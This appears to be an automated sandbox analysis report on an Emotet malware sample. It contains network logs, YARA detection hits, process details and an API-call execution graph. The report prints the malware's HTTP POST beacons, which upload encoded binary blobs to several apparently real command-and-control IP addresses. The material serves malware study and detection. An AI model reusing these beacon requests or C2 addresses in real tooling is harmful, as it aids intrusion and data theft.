                                  Aug 20, 2024 18:08:24.228647947 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:24.228657961 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:24.228667974 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:24.228676081 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:24.228787899 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:26.272000074 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:26.272087097 CEST497398080192.168.2.4120.138.30.150
                                  Aug 20, 2024 18:08:26.272178888 CEST497398080192.168.2.4120.138.30.150
                                  Aug 20, 2024 18:08:26.277124882 CEST808049739120.138.30.150192.168.2.4
                                  Aug 20, 2024 18:08:28.470295906 CEST4974080192.168.2.494.23.216.33
                                  Aug 20, 2024 18:08:28.475697041 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:28.475837946 CEST4974080192.168.2.494.23.216.33
                                  Aug 20, 2024 18:08:28.476016045 CEST4974080192.168.2.494.23.216.33
                                  Aug 20, 2024 18:08:28.476069927 CEST4974080192.168.2.494.23.216.33
                                  Aug 20, 2024 18:08:28.481153011 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:28.481203079 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:28.481211901 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:28.481220007 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:28.481231928 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:30.099977016 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:30.100075006 CEST4974080192.168.2.494.23.216.33
                                  Aug 20, 2024 18:08:30.100178003 CEST4974080192.168.2.494.23.216.33
                                  Aug 20, 2024 18:08:30.105140924 CEST804974094.23.216.33192.168.2.4
                                  Aug 20, 2024 18:08:34.086340904 CEST497418080192.168.2.4157.245.99.39
                                  Aug 20, 2024 18:08:34.091763020 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:34.091850042 CEST497418080192.168.2.4157.245.99.39
                                  Aug 20, 2024 18:08:34.092017889 CEST497418080192.168.2.4157.245.99.39
                                  Aug 20, 2024 18:08:34.092058897 CEST497418080192.168.2.4157.245.99.39
                                  Aug 20, 2024 18:08:34.096981049 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:34.097008944 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:34.097018957 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:34.097028017 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:34.097039938 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:36.308810949 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:36.308902025 CEST497418080192.168.2.4157.245.99.39
                                  Aug 20, 2024 18:08:36.309026003 CEST497418080192.168.2.4157.245.99.39
                                  Aug 20, 2024 18:08:36.313785076 CEST808049741157.245.99.39192.168.2.4
                                  Aug 20, 2024 18:08:38.639569998 CEST497428080192.168.2.4137.59.187.107
                                  Aug 20, 2024 18:08:38.644686937 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:08:38.644761086 CEST497428080192.168.2.4137.59.187.107
                                  Aug 20, 2024 18:08:38.645030022 CEST497428080192.168.2.4137.59.187.107
                                  Aug 20, 2024 18:08:38.645068884 CEST497428080192.168.2.4137.59.187.107
                                  Aug 20, 2024 18:08:38.649996042 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:08:38.650024891 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:08:38.650047064 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:08:38.650106907 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:08:38.650115967 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:09:00.006405115 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:09:00.006505966 CEST497428080192.168.2.4137.59.187.107
                                  Aug 20, 2024 18:09:00.006632090 CEST497428080192.168.2.4137.59.187.107
                                  Aug 20, 2024 18:09:00.012171030 CEST808049742137.59.187.107192.168.2.4
                                  Aug 20, 2024 18:09:03.832498074 CEST49743443192.168.2.494.23.237.171
                                  Aug 20, 2024 18:09:03.832534075 CEST4434974394.23.237.171192.168.2.4
                                  Aug 20, 2024 18:09:03.832736015 CEST49743443192.168.2.494.23.237.171
                                  Aug 20, 2024 18:09:03.832806110 CEST49743443192.168.2.494.23.237.171
                                  Aug 20, 2024 18:09:03.832813025 CEST4434974394.23.237.171192.168.2.4
                                  Aug 20, 2024 18:09:03.832937956 CEST4434974394.23.237.171192.168.2.4
                                  Aug 20, 2024 18:09:03.832967997 CEST49743443192.168.2.494.23.237.171
                                  Aug 20, 2024 18:09:03.832979918 CEST4434974394.23.237.171192.168.2.4
                                  Aug 20, 2024 18:09:07.545902967 CEST49744443192.168.2.461.19.246.238
                                  Aug 20, 2024 18:09:07.545984983 CEST4434974461.19.246.238192.168.2.4
                                  Aug 20, 2024 18:09:07.546073914 CEST49744443192.168.2.461.19.246.238
                                  Aug 20, 2024 18:09:07.546197891 CEST49744443192.168.2.461.19.246.238
                                  Aug 20, 2024 18:09:07.546219110 CEST4434974461.19.246.238192.168.2.4
                                  Aug 20, 2024 18:09:07.546252966 CEST49744443192.168.2.461.19.246.238
                                  Aug 20, 2024 18:09:07.546269894 CEST4434974461.19.246.238192.168.2.4
                                  Aug 20, 2024 18:09:07.546358109 CEST4434974461.19.246.238192.168.2.4
                                  Aug 20, 2024 18:09:10.999577045 CEST4974580192.168.2.4156.155.166.221
                                  Aug 20, 2024 18:09:11.004904985 CEST8049745156.155.166.221192.168.2.4
                                  Aug 20, 2024 18:09:11.005038023 CEST4974580192.168.2.4156.155.166.221
                                  Aug 20, 2024 18:09:11.005219936 CEST4974580192.168.2.4156.155.166.221
                                  Aug 20, 2024 18:09:11.005259037 CEST4974580192.168.2.4156.155.166.221
                                  Aug 20, 2024 18:09:11.010130882 CEST8049745156.155.166.221192.168.2.4
                                  Aug 20, 2024 18:09:11.010143995 CEST8049745156.155.166.221192.168.2.4
                                  Aug 20, 2024 18:09:11.010154009 CEST8049745156.155.166.221192.168.2.4
                                  Aug 20, 2024 18:09:11.010308027 CEST8049745156.155.166.221192.168.2.4
                                  Aug 20, 2024 18:09:11.010317087 CEST8049745156.155.166.221192.168.2.4
                                  Aug 20, 2024 18:09:32.382025957 CEST8049745156.155.166.221192.168.2.4
                                  Aug 20, 2024 18:09:32.382105112 CEST4974580192.168.2.4156.155.166.221
                                  • 71.72.196.159
                                  • 134.209.36.254
                                    • 134.209.36.254:8080
                                  • 120.138.30.150
                                    • 120.138.30.150:8080
                                  • 94.23.216.33
                                  • 157.245.99.39
                                    • 157.245.99.39:8080
                                  • 137.59.187.107
                                    • 137.59.187.107:8080
                                  • 94.23.237.171
                                    • 94.23.237.171:443
                                  • 61.19.246.238
                                    • 61.19.246.238:443
                                  • 156.155.166.221
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44973071.72.196.159806348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:07:35.563587904 CEST636OUTPOST /aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 71.72.196.159/aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------------wa4T8cPZY0e2iD10iYmCsX
                                  Host: 71.72.196.159
                                  Content-Length: 4692
                                  Cache-Control: no-cache
                                  Aug 20, 2024 18:07:35.563635111 CEST4692OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 77 61 34 54 38 63 50 5a 59 30 65 32 69 44 31 30 69 59 6d 43 73 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
                                  Data Ascii: ------------------------wa4T8cPZY0e2iD10iYmCsXContent-Disposition: form-data; name="xsnomwomeeql"; filename="clkfbfyc"Content-Type: application/octet-stream/\WTVOr|x9xye'kkik5 y.\J<7?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449737134.209.36.25480806348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:07:59.755335093 CEST541OUTPOST /Jg04eNfDVrhItWur/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 134.209.36.254/Jg04eNfDVrhItWur/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------------Ldiwo2HtMl13Eyf6TSeH
                                  Host: 134.209.36.254:8080
                                  Content-Length: 4692
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.449739120.138.30.15080806348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:08:24.223545074 CEST593OUTPOST /XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 120.138.30.150/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------KEv02otY
                                  Host: 120.138.30.150:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.44974094.23.216.33806348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:08:28.476016045 CEST524OUTPOST /FJlVHXJ3dGgmVB/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 94.23.216.33/FJlVHXJ3dGgmVB/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------------Il1zs2mVlo8QKpuKXr
                                  Host: 94.23.216.33
                                  Content-Length: 4644
                                  Cache-Control: no-cache
                                  Aug 20, 2024 18:08:28.476069927 CEST4644OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 49 6c 31 7a 73 32 6d 56 6c 6f 38 51 4b 70 75 4b 58 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 72 73
                                  Data Ascii: --------------------Il1zs2mVlo8QKpuKXrContent-Disposition: form-data; name="rsaswzwtds"; filename="rdkklt"Content-Type: application/octet-streamheCvbbcn7G1B]H@z3[SFG'5/E#rhc?X_y*


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.449741157.245.99.3980806348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:08:34.092017889 CEST507OUTPOST /vBtfrqns/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 157.245.99.39/vBtfrqns/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------GDD4s9bMfwx0
                                  Host: 157.245.99.39:8080
                                  Content-Length: 4644
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.449742137.59.187.10780806348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:08:38.645030022 CEST591OUTPOST /wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 137.59.187.107/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------RXnIInhAfmvjq1
                                  Host: 137.59.187.107:8080
                                  Content-Length: 4644
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.44974394.23.237.1714436348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:09:03.832806110 CEST576OUTPOST /IBDjcvxbhNBv3Y/nqDclyv1OKh853Z8d/c8YC/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 94.23.237.171/IBDjcvxbhNBv3Y/nqDclyv1OKh853Z8d/c8YC/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------------5eHhzpxtLmphkbrh51
                                  Host: 94.23.237.171:443
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.44974461.19.246.2384436348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:09:07.546197891 CEST490OUTPOST /yATH/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 61.19.246.238/yATH/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------meOftaXJ
                                  Host: 61.19.246.238:443
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.449745156.155.166.221806348C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 18:09:11.005219936 CEST646OUTPOST /Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------------upXrJchrkYq9xrNYMcg8EM
                                  Host: 156.155.166.221
                                  Content-Length: 4660
                                  Cache-Control: no-cache
                                  Aug 20, 2024 18:09:11.005259037 CEST4660OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 75 70 58 72 4a 63 68 72 6b 59 71 39 78 72 4e 59 4d 63 67 38 45 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
                                  Data Ascii: ------------------------upXrJchrkYq9xrNYMcg8EMContent-Disposition: form-data; name="wfubfuqrnhx"; filename="uwtirghrumzi"Content-Type: application/octet-streamB8~XatxKB8Q$NDC`,M3zN;|2Fn}Qq)r-


                                  Click to jump to process

                                  Click to jump to process

                                  Click to jump to process

                                  Target ID:0
                                  Start time:12:07:25
                                  Start date:20/08/2024
                                  Path:C:\Users\user\Desktop\ExeFile (317).exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\ExeFile (317).exe"
                                  Imagebase:0x400000
                                  File size:437'248 bytes
                                  MD5 hash:1D94974D27FC9127C69992D325AFBC89
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.1675139231.0000000000644000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000000.00000002.1675139231.0000000000644000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:12:07:25
                                  Start date:20/08/2024
                                  Path:C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe"
                                  Imagebase:0x400000
                                  File size:437'248 bytes
                                  MD5 hash:1D94974D27FC9127C69992D325AFBC89
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.2928434199.00000000020D4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Emotet_5528b3b0, Description: unknown, Source: 00000001.00000002.2928434199.00000000020D4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.4%
                                    Dynamic/Decrypted Code Coverage:73.2%
                                    Signature Coverage:29.2%
                                    Total number of Nodes:421
                                    Total number of Limit Nodes:27
                                    execution_graph 23024 40ec40 23029 40ebe0 23024->23029 23026 40ec48 23027 40ec71 VirtualAlloc 23026->23027 23028 40ec8a 23026->23028 23027->23028 23032 40e920 LoadLibraryW 23029->23032 23031 40ec09 23031->23026 23032->23031 23063 623060 23067 62307a 23063->23067 23064 62326f 23066 623215 23064->23066 23073 623e40 GetPEB 23064->23073 23065 623e40 GetPEB 23065->23067 23067->23064 23067->23065 23067->23066 23068 623da0 GetPEB 23067->23068 23070 6231c3 RtlAllocateHeap 23067->23070 23068->23067 23070->23066 23070->23067 23071 623283 23074 623da0 GetPEB 23071->23074 23073->23071 23074->23066 23569 410448 72 API calls ___InternalCxxFrameHandler 23652 413948 75 API calls 6 library calls 23572 641870 GetProcAddress 23465 626d79 23471 626d80 23465->23471 23466 623480 GetPEB 23466->23471 23467 626daf 23468 626cd0 GetPEB LoadLibraryW 23468->23471 23469 626e86 LoadLibraryW 23469->23471 23470 623e40 GetPEB 23470->23471 23471->23466 23471->23467 23471->23468 23471->23469 23471->23470 23472 623da0 GetPEB 23471->23472 23472->23471 23657 64157a SetLastError 23577 641840 LoadLibraryA 23658 418964 CloseHandle 23075 625c20 23083 6263f0 23075->23083 23077 625c25 23078 625c49 ExitProcess 23077->23078 23126 623e40 GetPEB 23077->23126 23080 625c38 23127 623da0 GetPEB 23080->23127 23082 625c44 23082->23078 23125 62640d 23083->23125 23085 623e40 GetPEB 23085->23125 23088 626802 23088->23077 23089 626cb5 23194 62afc0 GetPEB 23089->23194 23090 62647e 23090->23125 23169 627d60 GetPEB CreateFileW SetFileInformationByHandle 23090->23169 23182 6292f0 GetPEB GetTickCount GetCurrentProcessId 23090->23182 23184 626d70 GetPEB LoadLibraryW LoadLibraryW 23090->23184 23091 623da0 GetPEB 23091->23125 23092 626ca8 23193 628a20 GetPEB CreateProcessW 23092->23193 23102 626c9b 23192 628420 GetPEB 23102->23192 23107 624120 GetPEB 23107->23125 23115 626cad 23115->23077 23120 626ca0 23120->23077 23124 624060 GetPEB 23124->23125 23125->23085 23125->23088 23125->23089 23125->23090 23125->23091 23125->23092 23125->23102 23125->23107 23125->23124 23128 629530 23125->23128 23141 6280d0 23125->23141 23147 6288a0 23125->23147 23157 628660 23125->23157 23170 626f20 GetPEB 23125->23170 23171 629180 GetPEB 23125->23171 23172 6252e0 GetPEB 23125->23172 23173 625f00 GetPEB 23125->23173 23174 629bf0 GetPEB 23125->23174 23175 628f30 GetPEB 23125->23175 23176 628d10 GetPEB 23125->23176 23177 6232d0 GetPEB 23125->23177 23178 621880 GetPEB 23125->23178 23179 623420 GetPEB 23125->23179 23180 62aeb0 GetPEB 23125->23180 23181 62b110 GetPEB CreateProcessW GetCurrentProcessId 23125->23181 23183 629d30 GetPEB 23125->23183 23185 6212a0 GetPEB 23125->23185 23186 6283e0 GetPEB 23125->23186 23187 62acc0 GetPEB 23125->23187 23188 628b50 GetPEB 23125->23188 23189 626080 GetPEB 23125->23189 23190 624670 GetPEB GetCurrentProcessId 23125->23190 23191 627060 GetPEB 23125->23191 23126->23080 23127->23082 23132 629550 23128->23132 23129 629797 OpenSCManagerW 23129->23132 23130 629587 23130->23125 23131 623da0 GetPEB 23131->23132 23132->23129 23132->23130 23132->23131 23134 6297fc 23132->23134 23135 623e40 GetPEB 23132->23135 23195 627950 GetPEB 23132->23195 23137 62981b 23134->23137 23196 623e40 GetPEB 23134->23196 23135->23132 23198 623000 FindFirstFileW FindNextFileW FindClose GetPEB 23137->23198 23138 62980f 23197 623da0 GetPEB 23138->23197 23142 6281a1 23141->23142 23143 623da0 GetPEB 23142->23143 23144 6281fb CreateFileW 23142->23144 23145 6282f5 23142->23145 23146 623e40 GetPEB 23142->23146 23143->23142 23144->23142 23144->23145 23145->23125 23146->23142 23156 6288b4 23147->23156 23149 628a07 23225 623670 23149->23225 23151 6289bb 23151->23125 23152 628a10 23152->23125 23154 623e40 GetPEB 23154->23156 23155 623da0 GetPEB 23155->23156 23156->23149 23156->23151 23156->23154 23156->23155 23199 623740 23156->23199 23245 623480 23156->23245 23166 628681 23157->23166 23158 62885b 23160 6287f9 23158->23160 23297 623e40 GetPEB 23158->23297 23160->23125 23162 623e40 GetPEB 23162->23166 23163 623480 GetPEB 23163->23166 23164 623da0 GetPEB 23164->23166 23165 62886e 23298 623da0 GetPEB 23165->23298 23166->23158 23166->23160 23166->23162 23166->23163 23166->23164 23279 624f50 23166->23279 23296 623420 GetPEB 23166->23296 23169->23090 23170->23125 23171->23125 23172->23125 23173->23125 23174->23125 23175->23125 23176->23125 23177->23125 23178->23125 23179->23125 23180->23125 23181->23125 23182->23090 23183->23125 23184->23090 23185->23125 23186->23125 23187->23125 23188->23125 23189->23125 23190->23125 23191->23125 23192->23120 23193->23115 23194->23088 23195->23132 23196->23138 23197->23137 23198->23130 23200 623755 23199->23200 23204 62376b 23199->23204 23255 623e40 GetPEB 23200->23255 23202 62375f 23256 623da0 GetPEB 23202->23256 23206 62379d 23204->23206 23257 623e40 GetPEB 23204->23257 23208 6237d2 23206->23208 23259 623e40 GetPEB 23206->23259 23207 623791 23258 623da0 GetPEB 23207->23258 23213 62380a 23208->23213 23261 623e40 GetPEB 23208->23261 23211 6237c6 23260 623da0 GetPEB 23211->23260 23216 623836 23213->23216 23263 623e40 GetPEB 23213->23263 23215 6237fe 23262 623da0 GetPEB 23215->23262 23221 62388c 23216->23221 23265 623e40 GetPEB 23216->23265 23219 62382a 23264 623da0 GetPEB 23219->23264 23221->23156 23223 623880 23266 623da0 GetPEB 23223->23266 23226 623480 GetPEB 23225->23226 23227 623684 23226->23227 23228 6236a5 23227->23228 23267 623e40 GetPEB 23227->23267 23235 6236da 23228->23235 23269 623e40 GetPEB 23228->23269 23230 623699 23268 623da0 GetPEB 23230->23268 23233 6236ce 23270 623da0 GetPEB 23233->23270 23238 623702 23235->23238 23271 623e40 GetPEB 23235->23271 23237 6236f6 23272 623da0 GetPEB 23237->23272 23240 623733 DeleteFileW 23238->23240 23273 623e40 GetPEB 23238->23273 23240->23152 23242 623722 23274 623da0 GetPEB 23242->23274 23244 62372e 23244->23240 23246 6234a3 23245->23246 23247 6234c8 23246->23247 23275 623e40 GetPEB 23246->23275 23254 6234f0 23247->23254 23277 623e40 GetPEB 23247->23277 23249 6234bc 23276 623da0 GetPEB 23249->23276 23252 6234e4 23278 623da0 GetPEB 23252->23278 23254->23156 23255->23202 23256->23204 23257->23207 23258->23206 23259->23211 23260->23208 23261->23215 23262->23213 23263->23219 23264->23216 23265->23223 23266->23221 23267->23230 23268->23228 23269->23233 23270->23235 23271->23237 23272->23238 23273->23242 23274->23244 23275->23249 23276->23247 23277->23252 23278->23254 23295 624f6c 23279->23295 23280 6252d5 23280->23166 23281 6252a2 23289 6252cf RtlFreeHeap 23281->23289 23302 623e40 GetPEB 23281->23302 23282 625283 23282->23281 23300 623e40 GetPEB 23282->23300 23284 623da0 GetPEB 23284->23295 23285 62516c RtlAllocateHeap 23285->23280 23285->23295 23286 625296 23301 623da0 GetPEB 23286->23301 23289->23280 23290 623e40 GetPEB 23290->23295 23292 6252be 23303 623da0 GetPEB 23292->23303 23294 6252ca 23294->23289 23295->23280 23295->23282 23295->23284 23295->23285 23295->23290 23299 6241c0 GetPEB 23295->23299 23296->23166 23297->23165 23298->23160 23299->23295 23300->23286 23301->23281 23302->23292 23303->23294 23593 412bb7 70 API calls 4 library calls 23334 530000 23336 530005 23334->23336 23339 53002d 23336->23339 23359 530456 GetPEB 23339->23359 23342 530456 GetPEB 23343 530053 23342->23343 23344 530456 GetPEB 23343->23344 23345 530061 23344->23345 23346 530456 GetPEB 23345->23346 23347 53006d 23346->23347 23348 530456 GetPEB 23347->23348 23349 53007b 23348->23349 